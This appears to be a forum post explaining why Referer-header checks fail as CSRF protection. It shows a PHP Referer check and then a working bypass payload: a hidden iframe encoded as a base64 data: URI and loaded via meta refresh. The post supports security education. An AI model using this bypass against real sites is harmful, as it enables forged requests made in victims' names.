I have seen developers relying on using HTTP referer header as a method of mitigating CSRF. One of the reason is that it is proposed in the OWASP
CSRF mitigation techniques. Even though the article clearly says that trusting reffer is not the right idea to mitigate this issue.
https://www.owasp.org/index.php/Cros...Referer_Header. Also I have seen using orgin header to detect CSRF .
Note: Http referer header would be removed when request is made from https site to http and vise verse.
The following code checks whether HTTP_REFERER header is present , if present it will check if the current host equals refer host .If they both are not same then CSRF alert . Why mandate HTTP_REFERER header, because first GET request would never have referer .
ref
So with the above I won't be able to directly iframe the page , since frame request would have parent referer headers.PHP Code:
if(isset($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST']))
if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST)!=$_SERVER['HTTP_HOST'])
exit('Anti-CSRF mechanism!');
But this CSRF protection could be easily bypassed . The attacker only have to use any technique that would make him sent a request without referer header.
All we need to do is load the iframe from data: uri. Now the iframe would not have a parent, so no headers would be added.
<!DOCTYPE html>
<html>
<body>
<iframe src="https://target-server.com" style="display:none;">
</iframe>
</body>
</html>
Base64 encode it and load it inside http-equiv="Refresh".
data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxib2R5P g0KPGlmcmFtZSBzcmM9Imh0dHBzOi8vdGFyZ2V0LXNlcnZlci5 jb20iIHN0eWxlPSJkaXNwbGF5Om5vbmU7Ij4NCjwvaWZyYW1lP g0KPC9ib2R5Pg0KPC9odG1sPg==
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Refresh" content="2;url=data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxib2R5P g0KPGlmcmFtZSBzcmM9Imh0dHBzOi8vdGFyZ2V0LXNlcnZlci5 jb20iIHN0eWxlPSJkaXNwbGF5Om5vbmU7Ij4NCjwvaWZyYW1lP g0KPC9ib2R5Pg0KPC9odG1sPg==">
</head>
<body>
And we would successfully bypass referer and origin based csrf protections.
Regards,
Rahul Sasi